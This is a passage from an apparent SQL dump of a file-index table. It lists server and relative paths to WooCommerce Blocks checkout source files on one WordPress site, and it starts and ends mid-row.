s/checkout-order-summary-cart-items/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-cart-items/edit.tsx'),(8880,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-cart-items/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-cart-items/frontend.tsx'),(8881,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-cart-items/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-cart-items/index.tsx'),(8882,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-coupon-form/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-coupon-form/block.json'),(8883,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-coupon-form/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-coupon-form/block.tsx'),(8884,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-coupon-form/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-coupon-form/edit.tsx'),(8885,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-coupon-form/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-coupon-form/frontend.tsx'),(8886,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-coupon-form/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-coupon-form/index.tsx'),(8887,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-discount/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-discount/block.json'),(8888,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-discount/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-discount/block.tsx'),(8889,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-discount/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-discount/edit.tsx'),(8890,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-discount/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-discount/frontend.tsx'),(8891,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-discount/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-discount/index.tsx'),(8892,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-fee/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-fee/block.json'),(8893,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-fee/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-fee/block.tsx'),(8894,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-fee/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-fee/edit.tsx'),(8895,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-fee/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-fee/frontend.tsx'),(8896,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-fee/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-fee/index.tsx'),(8897,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-shipping/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-shipping/block.json'),(8898,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-shipping/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-shipping/block.tsx'),(8899,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-shipping/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-shipping/edit.tsx'),(8900,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-shipping/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-shipping/frontend.tsx'),(8901,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-shipping/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-shipping/index.tsx'),(8902,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-subtotal/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-subtotal/block.json'),(8903,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-subtotal/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-subtotal/block.tsx'),(8904,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-subtotal/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-subtotal/edit.tsx'),(8905,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-subtotal/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-subtotal/frontend.tsx'),(8906,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-subtotal/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-subtotal/index.tsx'),(8907,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-taxes/attributes.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-taxes/attributes.tsx'),(8908,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-taxes/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-taxes/block.json'),(8909,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-taxes/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-taxes/block.tsx'),(8910,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-taxes/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-taxes/edit.tsx'),(8911,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-taxes/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-taxes/frontend.tsx'),(8912,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-taxes/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-taxes/index.tsx'),(8913,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-payment-block/attributes.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-payment-block/attributes.tsx'),(8914,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-payment-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-payment-block/block.json'),(8915,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-payment-block/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-payment-block/block.tsx'),(8916,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-payment-block/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-payment-block/edit.tsx'),(8917,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-payment-block/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-payment-block/frontend.tsx'),(8918,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-payment-block/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-payment-block/index.tsx'),(8919,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-pickup-options-block/attributes.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-pickup-options-block/attributes.tsx'),(8920,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-pickup-options-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-pickup-options-block/block.json'),(8921,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-pickup-options-block/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-pickup-options-block/block.tsx'),(8922,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-pickup-options-block/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-pickup-options-block/edit.tsx'),(8923,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-pickup-options-block/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-pickup-options-block/frontend.tsx'),(8924,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-pickup-options-block/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-pickup-options-block/index.tsx'),(8925,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-pickup-options-block/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-pickup-options-block/style.scss'),(8926,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-address-block/attributes.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-address-block/attributes.tsx'),(8927,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-address-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-address-block/block.json'),(8928,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-address-block/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-address-block/block.tsx'),(8929,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-address-block/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-address-block/edit.tsx'),(8930,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-address-block/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-address-block/frontend.tsx'),(8931,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-address-block/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-address-block/index.tsx'),(8932,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-method-block/attributes.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-method-block/attributes.tsx'),(8933,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-method-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-method-block/block.json'),(8934,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-method-block/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-method-block/block.tsx'),(8935,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-method-block/constants.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-method-block/constants.tsx'),(8936,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-method-block/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-method-block/edit.tsx'),(8937,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-method-block/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-method-block/frontend.tsx'),(8938,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-method-block/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-method-block/index.tsx'),(8939,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-method-block/shared/helpers.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-method-block/shared/helpers.ts'),(8940,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-method-block/shared/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-method-block/shared/index.js'),(8941,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-method-block/shared/rate-price.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-method-block/shared/rate-price.tsx'),(8942,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-method-block/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-method-block/style.scss'),(8943,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-methods-block/attributes.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-methods-block/attributes.tsx'),(8944,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-methods-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-methods-block/block.json'),(8945,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-methods-block/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-methods-block/block.tsx'),(8946,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-methods-block/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-methods-block/edit.tsx'),(8947,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-methods-block/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-methods-block/editor.scss'),(8948,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-methods-block/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-methods-block/frontend.tsx'),(8949,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-methods-block/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-methods-block/index.tsx'),(8950,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-methods-block/no-shipping-placeholder/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-methods-block/no-shipping-placeholder/index.js'),(8951,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-methods-block/no-shipping-placeholder/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-methods-block/no-shipping-placeholder/style.scss'),(8952,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-methods-block/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-methods-block/style.scss'),(8953,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-terms-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-terms-block/block.json'),(8954,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-terms-block/constants.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-terms-block/constants.js'),(8955,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-terms-block/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-terms-block/edit.tsx'),(8956,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-terms-block/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-terms-block/editor.scss'),(8957,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-terms-block/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-terms-block/frontend.tsx'),(8958,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-terms-block/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-terms-block/index.tsx'),(8959,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-terms-block/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-terms-block/style.scss'),(8960,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-terms-block/test/edit.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-terms-block/test/edit.js'),(8961,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-terms-block/test/frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-terms-block/test/frontend.js'),(8962,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-totals-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-totals-block/block.json'),(8963,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-totals-block/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-totals-block/edit.tsx'),(8964,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-totals-block/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-totals-block/frontend.tsx'),(8965,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-totals-block/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-totals-block/index.tsx'),(8966,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-totals-block/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-totals-block/style.scss'),(8967,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/component-metadata.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/component-metadata.ts'),(8968,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/index.tsx'),(8969,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/register-components.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/register-components.ts'),(8970,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/order-notes/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/order-notes/index.tsx'),(8971,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/order-notes/test/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/order-notes/test/index.js'),(8972,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/phone-number/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/phone-number/index.tsx'),(8973,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/phone-number/test/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/phone-number/test/index.js'),(8974,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/styles/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/styles/editor.scss'),(8975,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/styles/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/